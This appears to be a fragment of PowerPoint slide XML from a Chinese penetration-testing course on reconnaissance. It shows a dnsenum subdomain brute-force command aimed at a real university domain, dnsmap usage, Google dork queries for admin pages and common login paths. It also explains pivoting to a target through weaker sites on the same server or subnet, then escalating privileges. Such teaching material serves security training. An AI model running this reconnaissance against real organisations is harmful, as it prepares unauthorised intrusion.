          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="948086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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332927" y="2008805"/>
            <a:ext cx="5536027" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜集信息比较规整全面，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>mx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>记录，自动尝试区域传送，也会从搜索引擎上抓取目标子域，不过不太好使了。当上述动作执行完之后，即开始爆破。最后，把获取到目标的所有的域名所在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CIDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式列出来。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>获取域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>cityu.edu.hk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>子域名：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> —</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8.8.8.8 —</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dns.txt cityu.edu.hk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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子域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315164" y="1340578"/>
            <a:ext cx="4307589" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>获取目标子域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15B5BBC-3076-400D-8DD4-10DDFBC14B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5876837" y="1802243"/>
            <a:ext cx="6108700" cy="4734560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4267402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子域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3506650" y="1741795"/>
            <a:ext cx="4015843" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dnsmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行子域名爆破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0505950C-A67C-48E6-A9A4-F56B54BCAA2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2941859" y="2707135"/>
            <a:ext cx="6108700" cy="2955290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11071524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旁站，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段搜索</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688677" y="2008805"/>
            <a:ext cx="11092775" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>旁站和搜集子域的情况类似，我们的直接目标站做的比较到位，从目标站本身基本上找不到什么比较好的入手点。这时候</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果想要快速拿下目标的话，一般都会先找个目标站点所在服务器上其他的比较好搞的站下手，然后再想办法跨到真正目标的站点目录中。前提是有权限，如果实在跨不过去，就只能想办法先提权了。拿到服务器的最高权限以后就可以对目标站为所欲为了，一般我们把这种渗透方式就叫旁站。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>站和旁站差不多的是，旁站是通过同一台服器上的其它网站跨到目标站的目录里，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段则是通过目标所在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段的其他任意一台机器想办法跨到我们的目标机器上。至于怎么跨，嗅探，社工，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等，反正最终目的能跨过去即可。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实战可能还会有个问题就是，你搞下的一台目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段机器在内网，也就是说它根本没有公网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，像如果是这种情况，这台机器对你就没什么价值了。另外，如果是虚拟机，这种方式可能也不太好使，因为光提权就比较困难。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835746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旁站，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段搜索</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612408" y="2042312"/>
            <a:ext cx="11092775" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://www.webscan.cc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询目标旁站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB802F07-BE97-4E72-B1FF-65A13DDD984E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763356" y="2638782"/>
            <a:ext cx="6108700" cy="2196465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9370505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整站分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3403885" y="1249210"/>
            <a:ext cx="11092775" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>www.yunsee.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询域名下网站信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C207F005-E65A-4585-AE9E-31246B34D36E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2724409" y="1830882"/>
            <a:ext cx="6108700" cy="4739005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32716491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谷歌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939551" y="2224748"/>
            <a:ext cx="6215976" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常用语法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：指定域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>intext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：正文中存在关键字的网页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>intitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：标题中存在关键字的网页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：一些基本信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存在关键字的网页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：搜索指定文件类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD772670-4FA2-4A31-B759-8F2BB277C382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479877" y="1905506"/>
            <a:ext cx="6215976" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后台页面常用文件名：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin/login.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>manage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>login.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831315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463690" y="2228671"/>
            <a:ext cx="6215976" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9DDD6B-F0D0-4838-A829-7162BE6B3E14}"/>
              </a:ext>
            </a:extLst>
